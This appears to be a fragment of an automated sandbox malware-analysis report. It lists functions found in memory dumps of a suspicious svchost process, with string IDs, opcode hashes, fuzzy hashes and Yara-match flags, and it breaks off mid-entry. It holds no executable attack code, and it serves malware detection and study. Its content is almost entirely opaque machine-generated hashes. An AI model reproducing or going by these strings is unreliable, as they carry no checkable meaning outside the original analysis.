                                          • Opcode ID: c577888cd4d70528e4315cb6aea9be07035f2d65fa9205ecf0dd0b8bb5afca87
                                          • Instruction ID: 51dd04583478addddb396dbd2696b409947b031f63e3d0a80bfeef41b7239a53
                                          • Opcode Fuzzy Hash: c577888cd4d70528e4315cb6aea9be07035f2d65fa9205ecf0dd0b8bb5afca87
                                          • Instruction Fuzzy Hash: 83021E76E006189FDB14CF9AD4805DDFBF2FF88314F1AC1AAD859A7315D674AA418F80
                                          Function 004162C3 Relevance: 1.7, Strings: 1, Instructions: 423COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1541457922.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_400000_svchost.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID: (
                                          • API String ID: 0-3887548279
                                          • Opcode ID: 5b5895f0e51fce406fdbb92f5fe0f57fd39733701dba8a51bdd5afbf1107f5ef
                                          • Instruction ID: b524d719206992a9a68ffaadc578d71d4edddff9dd5102106b9d20b215f9678d
                                          • Opcode Fuzzy Hash: 5b5895f0e51fce406fdbb92f5fe0f57fd39733701dba8a51bdd5afbf1107f5ef
                                          • Instruction Fuzzy Hash: D1021E76E006189FDB14CF9AD4805DDFBF2FF88314F1AC1AAD859A7315D674AA418F80
                                          Function 03632FC8 Relevance: 1.7, Strings: 1, Instructions: 410COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1549858763.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_3600000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: PATH
                                          • API String ID: 0-1036084923
                                          • Opcode ID: 023c9aa3ba730e8dff961ab03c800ed178392423829caf6ed411e04152ac83bf
                                          • Instruction ID: c7f2ed9faacc10fb7b4ac0b0360b3df091f8f0f1326ef43721c1dde4de406b91
                                          • Opcode Fuzzy Hash: 023c9aa3ba730e8dff961ab03c800ed178392423829caf6ed411e04152ac83bf
                                          • Instruction Fuzzy Hash: D0F1D179E00258DBDB25DF98D981ABEBBF1FF4A700F688029E441AB350D7749C41CB65
                                          Function 0366F603 Relevance: 1.6, APIs: 1, Instructions: 121COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1549858763.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_3600000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 908288775244fba5e7657664d9a15f1a7e495d0b5839d18e1909d4f8f0143b64
                                          • Instruction ID: bc99c930b40c4da76929bcfbd83a8513674420713844b09f3889f73e16352f97
                                          • Opcode Fuzzy Hash: 908288775244fba5e7657664d9a15f1a7e495d0b5839d18e1909d4f8f0143b64
                                          • Instruction Fuzzy Hash: 40414AB4900288AFDB20DFA9D580AADFBF4FB49340F54816ED959EB211D734A950DF60
                                          Function 03630100 Relevance: 1.6, Strings: 1, Instructions: 321COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1549858763.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_3600000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID: 0-3916222277
                                          • Opcode ID: cfc405c0a1a7c7a04ecaf35f9db0f8b7c162ebbd600aa53015ab419d75e7064a
                                          • Instruction ID: 07159e96efa2cd17355f1abeb3b63d93af1dfa92dbd1209198c2ffa6f7f29da9
                                          • Opcode Fuzzy Hash: cfc405c0a1a7c7a04ecaf35f9db0f8b7c162ebbd600aa53015ab419d75e7064a
                                          • Instruction Fuzzy Hash: 36A15D35A083686BDF24DB688A41BFEA7B85F4B304F0840DDED876B381C6B5C949CB55
                                          Function 0366A660 Relevance: 1.4, Strings: 1, Instructions: 200COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1549858763.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_3600000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: GlobalTags
                                          • API String ID: 0-1106856819
                                          • Opcode ID: 1a44244ca997e04928b26640cd75a2126115a72ca856b0f3cb1cf4117fdd01a8
                                          • Instruction ID: e489b179006cfa1e171b88ac69ea38764c3d16dcfa29eb499e8209c49e8c2957
                                          • Opcode Fuzzy Hash: 1a44244ca997e04928b26640cd75a2126115a72ca856b0f3cb1cf4117fdd01a8
                                          • Instruction Fuzzy Hash: E9713975E0061A9FDB28CF9CD6946ADBBB5BF48740F18816EE806AB340D7709D41CF64
                                          Function 00402780 Relevance: 1.4, Strings: 1, Instructions: 193COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1541457922.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_400000_svchost.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID: P^
                                          • API String ID: 0-2008101720
                                          • Opcode ID: 75d445eb10a09a01e41d6a9b87e5dfd9f850dcd8ded6b06d9709727e7ca24427
                                          • Instruction ID: aab23c59a63454cd6d9a3c47a39911bf7f8060d29294eb05fccf2f7292cd95f2
                                          • Opcode Fuzzy Hash: 75d445eb10a09a01e41d6a9b87e5dfd9f850dcd8ded6b06d9709727e7ca24427
                                          • Instruction Fuzzy Hash: CA512876F0020A47CB2CCD5EDD8426AB252EBE4315F1C827BDD08AF7D1E6B9AD1586C4
                                          Function 0363973A Relevance: 1.4, Strings: 1, Instructions: 191COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1549858763.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_3600000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: @
                                          • API String ID: 0-2766056989
                                          • Opcode ID: 32fdc9af89b0788a3bba97dbd317d7b10cd0208f20562fc1281393ba3f626ce3
                                          • Instruction ID: 1cfc58168302b2c59493645412338db0ecc247658966df5d6d3be76a11286db7
                                          • Opcode Fuzzy Hash: 32fdc9af89b0788a3bba97dbd317d7b10cd0208f20562fc1281393ba3f626ce3
                                          • Instruction Fuzzy Hash: 11617D75D00219ABDF21DF99C944BAEFBF8FF85714F144A6AE810A7290D7B49901CF50
                                          Function 036BF7AF Relevance: 1.4, Strings: 1, Instructions: 161COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1549858763.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_3600000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: @
                                          • API String ID: 0-2766056989
                                          • Opcode ID: 8281e956446473216ed512d18dfae26456dfb93296f0f4edbd2d8efa18977056
                                          • Instruction ID: de69738bca26aab09e451f26a3882d74ea14f9395ea660894c422b55e20d1718
                                          • Opcode Fuzzy Hash: 8281e956446473216ed512d18dfae26456dfb93296f0f4edbd2d8efa18977056
                                          • Instruction Fuzzy Hash: 38517872604305AFD721EF54CD40FAAB7F8FB84B50F04092DBA809B2A0D7B1E954CB95
                                          Function 0040F93D Relevance: 1.4, Strings: 1, Instructions: 160COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1541457922.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_400000_svchost.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID: LK
                                          • API String ID: 0-3496619222
                                          • Opcode ID: e2d358a88f1b9729e6168f07938800b68f223847e10ca7bd8275c0c8e4539e24
                                          • Instruction ID: 9ba215e90ef302cb23fa3af648b41c8e9579085b6a5809109bfc8d7766ee6520
                                          • Opcode Fuzzy Hash: e2d358a88f1b9729e6168f07938800b68f223847e10ca7bd8275c0c8e4539e24
                                          • Instruction Fuzzy Hash: 0A5182B3E14A214BD318CF09CC50631B692EFD8312B5B81BEDD199B357CA74E9529A90
                                          Function 0364E627 Relevance: 1.4, Strings: 1, Instructions: 148COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1549858763.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_3600000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: EXT-
                                          • API String ID: 0-1948896318
                                          • Opcode ID: 4b727eda413d6b17d6b9535ebb99220816a5a1de4fb35cb3d6c654595c926214
                                          • Instruction ID: 21f83fc0e2911a1b284390625cdc9e58a31a0de520c8bf6e8593683e988d60ba
                                          • Opcode Fuzzy Hash: 4b727eda413d6b17d6b9535ebb99220816a5a1de4fb35cb3d6c654595c926214
                                          • Instruction Fuzzy Hash: 26418076A083019BD710DB75CA84B6BB7E8BF88714F440D2DF985DB280EB75D904C79A
                                          Function 0040277C Relevance: 1.4, Strings: 1, Instructions: 138COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1541457922.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_400000_svchost.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID: P^
                                          • API String ID: 0-2008101720
                                          • Opcode ID: 4e6ab60901a2a98d6f67859f4b563a613c867f11412c2ca6fd13982333af56a9
                                          • Instruction ID: 9b46b326da877b73d076108d066f08b37a118464090ae3836a73a30cf9b2f8bf
                                          • Opcode Fuzzy Hash: 4e6ab60901a2a98d6f67859f4b563a613c867f11412c2ca6fd13982333af56a9
                                          • Instruction Fuzzy Hash: 2F412A76F002094BDB2CCD1DCE9835A7252EBE4305F1C827ADD056F7D1E6B8AE158680
                                          Function 036EB256 Relevance: 1.4, Strings: 1, Instructions: 130COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1549858763.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_3600000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: PreferredUILanguages
                                          • API String ID: 0-1884656846
                                          • Opcode ID: 429f081783d11c63b27201517ee6105645ede39115fdab76c1cb3547c2d0eb9c
                                          • Instruction ID: 41d73c71cceed6cf726749f2e6388583aa4094814e69624f26ebc3b890213ad4
                                          • Opcode Fuzzy Hash: 429f081783d11c63b27201517ee6105645ede39115fdab76c1cb3547c2d0eb9c
                                          • Instruction Fuzzy Hash: 1041E636D05219ABCF11DA94C941BEEF7B9EF44710F05016AE911EB354DAB0DE48CBA4
                                          Function 036AC730 Relevance: 1.4, Strings: 1, Instructions: 129COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1549858763.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_3600000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: BinaryHash
                                          • API String ID: 0-2202222882
                                          • Opcode ID: e6d4eaa618891ffa01522ac999162f7e0c31a470fadd53387f9aa5ba82bf82e3
                                          • Instruction ID: 5050e1ac809b3756096bbe2c335ae7b4af01d888695b53cc4544b52ddb942a9e
                                          • Opcode Fuzzy Hash: e6d4eaa618891ffa01522ac999162f7e0c31a470fadd53387f9aa5ba82bf82e3
                                          • Instruction Fuzzy Hash: 2E4145B5D0062CABDB21DB54CC84FDEB77CAB45714F4045E9E608EB240DB709E898FA8
                                          Function 036B97A9 Relevance: 1.4, Strings: 1, Instructions: 121COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1549858763.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_3600000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: verifier.dll
                                          • API String ID: 0-3265496382
                                          • Opcode ID: 9ae3b7526a365b293466ce1bd8841c921e15d89f547e2c05b9a7152c0bcb7cb2
                                          • Instruction ID: 0d6f0649fefcb7a4e82c02fea64c8bf698d9348f0b97a41022c05c5199b2e6d8
                                          • Opcode Fuzzy Hash: 9ae3b7526a365b293466ce1bd8841c921e15d89f547e2c05b9a7152c0bcb7cb2
                                          • Instruction Fuzzy Hash: 153180B5A403019FDB24DF699950AB6B6F5EB49310F98887EE6099F381E7318C818B94
                                          Function 036636EF Relevance: 1.4, Strings: 1, Instructions: 106COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1549858763.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_3600000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: Flst
                                          • API String ID: 0-2374792617
                                          • Opcode ID: 1cdf4a0237750d30059002fb375216ce37e3c0f1c1d772a12f1314767932ef6a
                                          • Instruction ID: 4af63eb8ca623391cb8efb56aff8c7f097b3532c009b5dd5689292bbb993af26
                                          • Opcode Fuzzy Hash: 1cdf4a0237750d30059002fb375216ce37e3c0f1c1d772a12f1314767932ef6a
                                          • Instruction Fuzzy Hash: 7A4198B56053019FC314CF18C184A16FBE4EB89754F28856EE44A8F391DB31D942CF99
                                          Function 03635096 Relevance: 1.3, Strings: 1, Instructions: 71COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1549858763.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_3600000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: Actx
                                          • API String ID: 0-89312691
                                          • Opcode ID: f69a2859a1e5ac56c0f88511659ffabdf373a8f7619218792ca38fbe94be20d4
                                          • Instruction ID: 313eca75b1d8bfdd27de6b6c42c0c0b6de4610fd30712caa0cdb8affdd155dea
                                          • Opcode Fuzzy Hash: f69a2859a1e5ac56c0f88511659ffabdf373a8f7619218792ca38fbe94be20d4
                                          • Instruction Fuzzy Hash: E91160307096028BEB28C91D89546B6F6D9EF97264F3C852AE663CB391D773D8428780
                                          Function 036B106E Relevance: 1.3, Strings: 1, Instructions: 62COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1549858763.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_3600000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: LdrCreateEnclave
                                          • API String ID: 0-3262589265
                                          • Opcode ID: 3bb02f52181d1ae565e87c0cd7d5bf62f2860f29af686cda255049f36c46e84e
                                          • Instruction ID: e22d107970d5fcf3c96b5fbb52aaa99cc56316aa6c842f6563b3f6a2b22e29a1
                                          • Opcode Fuzzy Hash: 3bb02f52181d1ae565e87c0cd7d5bf62f2860f29af686cda255049f36c46e84e
                                          • Instruction Fuzzy Hash: CF2134B1508344AFD320DF2AC804A9BFBE8EBD6B00F044A1EB5A08B250DBB09545CF96
                                          Function 0366E8F0 Relevance: 1.0, Instructions: 985COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1549858763.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_3600000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 9121aec9a241616c6dd17ab1de8bb016cfb392964efc9ce52f41e69be5bb271b
                                          • Instruction ID: 4a280fbc98fe7c4eea95c4e384acc1f402609275edffabcb9cca38965550c36a
                                          • Opcode Fuzzy Hash: 9121aec9a241616c6dd17ab1de8bb016cfb392964efc9ce52f41e69be5bb271b
                                          • Instruction Fuzzy Hash: AB822472F102188FCB58CFADD8916DDB7F2EF88314B19812DE416EB349DA34AC568B45
                                          Function 0367516C Relevance: .8, Instructions: 785COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1549858763.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_3600000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 21346d3ade96e5cff4840e3212de7c87c4cd7ce695049781e712288dca8429a9
                                          • Instruction ID: d01f84273497d64d6f25ce0e25f88195a1948a6e79f2864fcc216c859a925533
                                          • Opcode Fuzzy Hash: 21346d3ade96e5cff4840e3212de7c87c4cd7ce695049781e712288dca8429a9
                                          • Instruction Fuzzy Hash: 66628F3290464AAFCF24CF08D5904AEFB72BA56314B89C6DCCA9B27704D371BA55CBD1
                                          Function 0368739A Relevance: .7, Instructions: 705COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1549858763.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_3600000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: c94790cd9ae216031a0d54be32fbcb594dfe7af4d9be41aba7a831c8ba66d9b5
                                          • Instruction ID: 9504580056d2e77c62b22c7735c85e61f7cb15c7a9476a0c4d3f9918c5fd4746
                                          • Opcode Fuzzy Hash: c94790cd9ae216031a0d54be32fbcb594dfe7af4d9be41aba7a831c8ba66d9b5
                                          • Instruction Fuzzy Hash: E642C275A006168FDB14DF59C580ABEF7B6FF8C314B28866DD552AB340DB34E842CBA0
                                          Function 03685AA0 Relevance: .7, Instructions: 652COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1549858763.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_3600000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 86e1fc953f9734f122b5cf9138eeacf0118e62c53451ba632b2d76c7faa63c28
                                          • Instruction ID: eb35deafee5a148e98e8bfd7d17763f272ec6adeb0cd97324e3dbf259a8d3c2a
                                          • Opcode Fuzzy Hash: 86e1fc953f9734f122b5cf9138eeacf0118e62c53451ba632b2d76c7faa63c28
                                          • Instruction Fuzzy Hash: 89128273B716180BC344CD7DCC852C27293ABD452875FCA3CAD68CB706F66AED1A6684
                                          Function 0365B2C0 Relevance: .6, Instructions: 629COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1549858763.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_3600000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 7e8bedf0ab1c44f63292438cd78a2988a66b23611060334857ab650ba675e3ba
                                          • Instruction ID: f26811ab4c5d29a51d2666c36dce220d8f4b6b8078d65854eea0a04cdbbb79b6
                                          • Opcode Fuzzy Hash: 7e8bedf0ab1c44f63292438cd78a2988a66b23611060334857ab650ba675e3ba
                                          • Instruction Fuzzy Hash: 6C32AC76E01219DBCF24DFA8C994BAEBBB5FF54714F18002AEC05AB381E7759911CB90
                                          Function 03642840 Relevance: .6, Instructions: 605COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1549858763.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_3600000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 51fa90f2d6fc7e77e39bfeda8c69bf4a44f2136ea713ffea4c7b08cca53df2cc
                                          • Instruction ID: 284b4a40b1ba63394f27740b2aec2d0e1fdcd678752c98808c9f87a13c515515
                                          • Opcode Fuzzy Hash: 51fa90f2d6fc7e77e39bfeda8c69bf4a44f2136ea713ffea4c7b08cca53df2cc
                                          • Instruction Fuzzy Hash: 3432CD74A007558BEF24CF69CA547BEFBFAAF84314F28855EE4469B384D735A802CB50
                                          Function 036DA118 Relevance: .6, Instructions: 591COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1549858763.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_3600000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 7285ebbdc8d6d1625025dd5f817c950a4b7d4a9f7caee0f677c7c49bb6e47cba
                                          • Instruction ID: 71246390a9ed15d8ad398fd047a3d5282335d68fa9d79f4e3d270904c84e7079
                                          • Opcode Fuzzy Hash: 7285ebbdc8d6d1625025dd5f817c950a4b7d4a9f7caee0f677c7c49bb6e47cba
                                          • Instruction Fuzzy Hash: CE22DF74A08691CBDB24CFA9C294772B7F1AF44300F0C859AE886CF785E735E562CB64
                                          Function 036F16CC Relevance: .6, Instructions: 571COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1549858763.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_3600000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: a9ca1f758236a251bfed1a50216bfb3a6522f01011ad6bf9533e38a4539a7931
                                          • Instruction ID: fefc5ffeb383530c5e2180fd2e312fa1d8a101aa28224aed39ba449d7aceca20
                                          • Opcode Fuzzy Hash: a9ca1f758236a251bfed1a50216bfb3a6522f01011ad6bf9533e38a4539a7931
                                          • Instruction Fuzzy Hash: 3522D235A00216CFCB19CF59C590ABAF7B2FF8A354B28456DDA56DB344DB30E942CB90
                                          Function 0365FB80 Relevance: .6, Instructions: 559COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1549858763.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_3600000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 3c867be53c2c554a3f566d98594122699f75c8394f273a8fa809e1c6b3fb0a79
                                          • Instruction ID: 713a091efd85b061d5f0daae6aa6635ce90b7cb63c11f0220c2d48bebeec2b20
                                          • Opcode Fuzzy Hash: 3c867be53c2c554a3f566d98594122699f75c8394f273a8fa809e1c6b3fb0a79
                                          • Instruction Fuzzy Hash: B222C074900609EFDB14DFA8C990BAEB7B5FF48310F2485A9E814AB345E734EA41CF94
                                          Function 036F1D5A Relevance: .6, Instructions: 559COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1549858763.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_3600000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: f3c9ed4017a950788a82ec1e33b39c764cc97a159b6fa27348b8f8f352682b8e
                                          • Instruction ID: f6a95d6246a762919c9bc2b7a830d9026c456047c68e0439d7a6c1d2335a00bf
                                          • Opcode Fuzzy Hash: f3c9ed4017a950788a82ec1e33b39c764cc97a159b6fa27348b8f8f352682b8e
                                          • Instruction Fuzzy Hash: 6522A0396047128FC718CF18C5A0A2AF7E5FF89314B188A6DEA96CB355D730E846CF95
                                          Function 03658DBF Relevance: .6, Instructions: 554COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1549858763.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_3600000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 921b4d64fdf1f3747df45ebbf0b0b76e4727f4034c00df19a952bb80b22f996e
                                          • Instruction ID: 4eea2e779686f4d18fae863b40b9a6ef5343e1f97b2945d1547aa2154636d119
                                          • Opcode Fuzzy Hash: 921b4d64fdf1f3747df45ebbf0b0b76e4727f4034c00df19a952bb80b22f996e
                                          • Instruction Fuzzy Hash: E8222C70E0021ADBDF14CF95C5809BEFBFAAF48704F5980AAE845AB641E734D942CB64
                                          Function 036F2446 Relevance: .5, Instructions: 485COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1549858763.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_3600000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 13bc9af504f2530e96f97f51d774b37fb01662b80aa5f0667db837b5a7e565b2
                                          • Instruction ID: 8c0abc78a8da9414d67baf34fc8c10ac618f3b6b71d50f8e6f646745f4709499
                                          • Opcode Fuzzy Hash: 13bc9af504f2530e96f97f51d774b37fb01662b80aa5f0667db837b5a7e565b2
                                          • Instruction Fuzzy Hash: C802F1386046518FDB24CF2AC560275FBF1AF85300B18899AEAD6CF385D734E996DF60
                                          Function 0370B16B Relevance: .4, Instructions: 450COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1549858763.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_3600000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 76af3d37fb99fd25720d3d2cfbc5b7e11662ce655a14b4671dc3a543c1aab988
                                          • Instruction ID: f9ed8900d0aeb0feac583f280e43213b4e6b9345a3805a930769628e90632104
                                          • Opcode Fuzzy Hash: 76af3d37fb99fd25720d3d2cfbc5b7e11662ce655a14b4671dc3a543c1aab988
                                          • Instruction Fuzzy Hash: 96F1D572E006159BCB18CFA9C9A067EFBF5EF8821071D41ADD456DB3C1E674EA41CB90
                                          Function 0040FB63 Relevance: .4, Instructions: 435COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1541457922.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_400000_svchost.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 937a55679482902739b3c28cbd4d4033f685ec815d12dd2f022c6521ee9f93e4
                                          • Instruction ID: 901dcd232d1a1a050e031e96c43c26619ad832ba1b1279c811f3fd1b07e6b428
                                          • Opcode Fuzzy Hash: 937a55679482902739b3c28cbd4d4033f685ec815d12dd2f022c6521ee9f93e4
                                          • Instruction Fuzzy Hash: 72026E73E547164FE720CE4ACDC4725B3A3EFC8301F5B81B8CA142B613CA39BA525A90
                                          Function 0370A9A6 Relevance: .4, Instructions: 425COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1549858763.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_3600000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 987e90e0317f7beebd37cfb0e00b4d08b2c0129b6aedab55b7fb7f44ae0aa99d
                                          • Instruction ID: b1aa32e138c63196a12cec60a54d469bd11cb139553bf05c460e55cca820a912
                                          • Opcode Fuzzy Hash: 987e90e0317f7beebd37cfb0e00b4d08b2c0129b6aedab55b7fb7f44ae0aa99d
